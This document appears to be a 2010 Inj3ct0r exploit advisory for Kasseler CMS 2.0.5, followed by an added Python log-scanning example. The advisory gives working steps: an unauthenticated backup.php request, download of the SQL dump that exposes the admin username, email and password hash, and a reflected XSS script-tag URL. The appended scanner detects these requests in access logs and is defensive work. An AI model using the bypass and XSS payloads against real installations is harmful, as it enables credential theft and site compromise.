Kasseler CMS 2.0.5 => By Pass / Download Backup Vulnerability
Posted on 26 April 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Kasseler CMS 2.0.5 => By Pass / Download Backup Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>
=============================================================
Kasseler CMS 2.0.5 => By Pass / Download Backup Vulnerability
=============================================================

========================================================================================
| # Title     : kasseler cms 2.0.5 => by Pass / Download Backup Vulnerability
| # Author    : indoushka
| # email     : indoushka@hotmail.com
| # Dork      : Copyright ©2007-2009 by Kasseler CMS. All rights reserved.
| # Tested on : windows SP2 Français V.(Pnx2 2.0)
| # Bug       : Backup
====================== Exploit By indoushka =================================
# Exploit :

1 - http://127.0.0.1/kasseler/backup.php

File size: 37.38 KB
Tables processed: 39
Rows processed: 37

2 - http://127.0.0.1/uploads/backup/auto_2010-04-27_14-29.sql

At lines 645:668, col 1, you find the login information:

INSERT INTO `kasseler_users` VALUES
(-1, 'guest', 'Guest', '', '', 'default.png', '0000-00-00 00:00:00', 'default', 0, '', '', '', '', '', 5, '', '0', '', '0000-00-00 00:00:00', '', '', '0000-00-00', 0, '', '', '', '', '', '', 0, -1, 0, 0, 0, 0, 0, 0, '', 0, 'MBzx97cQMjKQ47tJgil9PBQDr', 1, 0, 0, '0.00', 0, 1, NULL),
(1, 'admin', 'admin', 'admin@127.0.0.1', 'http://127.0.0.1/', 'admin.png', '2010-04-27 11:25:22', 'default', 2, NULL, NULL, NULL, NULL, 'd0970714757783e6cf17b26fb8e2298f', 1, NULL, '0.0.0.0', 'N/A', '0000-00-00 00:00:00', 'N/A', 'N/A', '0000-00-00', 0, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, NULL, 1, 0, 0, '0.00', 0, 1, NULL);

3 - XSS : http://127.0.0.1/index.php?online/<script>alert(213771818860)</script>

#
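
Added example, not part of the original advisory: an access-log check a site operator can run to see whether the three requests listed above reached their own installation (backup script run, a dump under uploads/backup/ served, a script tag in the URL). The log lines, client addresses and rule names are constructed for illustration, and the Apache combined log format is an assumption.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (Apache combined log format assumed; not from the advisory).
SAMPLE_LOG = """\
203.0.113.7 - - [27/Apr/2010:14:29:03 +0000] "GET /kasseler/backup.php HTTP/1.1" 200 412 "-" "Mozilla/5.0"
203.0.113.7 - - [27/Apr/2010:14:29:41 +0000] "GET /uploads/backup/auto_2010-04-27_14-29.sql HTTP/1.1" 200 38277 "-" "Mozilla/5.0"
198.51.100.9 - - [27/Apr/2010:14:31:10 +0000] "GET /index.php?online/%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [27/Apr/2010:14:32:00 +0000] "GET /uploads/backup/auto_2010-04-27_14-29.sql HTTP/1.1" 403 199 "-" "Mozilla/5.0"
192.0.2.15 - - [27/Apr/2010:14:33:12 +0000] "GET /index.php?online HTTP/1.1" 200 4980 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
BACKUP_SCRIPT = re.compile(r"/backup\.php$", re.I)
BACKUP_DUMP = re.compile(r"/uploads/backup/[^/]+\.sql$", re.I)
SCRIPT_TAG = re.compile(r"\x3c\s*script", re.I)  # \x3c is the less-than sign


def classify(line):
    """Return (client_ip, rule_name) for a suspicious request, else None.
    Rule names are hypothetical labels chosen for this example."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, _method, target, status = m.groups()
    decoded = unquote(target)          # turn %3C back into the raw character
    path = decoded.split("?", 1)[0]
    served = status.startswith("2")    # a 403/404 means nothing was handed out
    if served and BACKUP_DUMP.search(path):
        return ip, "backup-dump-served"
    if served and BACKUP_SCRIPT.search(path):
        return ip, "backup-script-run"
    if SCRIPT_TAG.search(decoded):
        return ip, "script-tag-in-url"
    return None


def scan(log_text):
    """Classify every line and keep only the hits, in log order."""
    hits = (classify(line) for line in log_text.splitlines())
    return [hit for hit in hits if hit]


if __name__ == "__main__":
    for ip, rule in scan(SAMPLE_LOG):
        print(ip, rule)
```

A "backup-dump-served" hit means a database dump left the server, so the credentials in it should be treated as exposed; a 403 on the same path, as in the fourth sample line, produces no hit.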
<a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-26]</pre></body></html>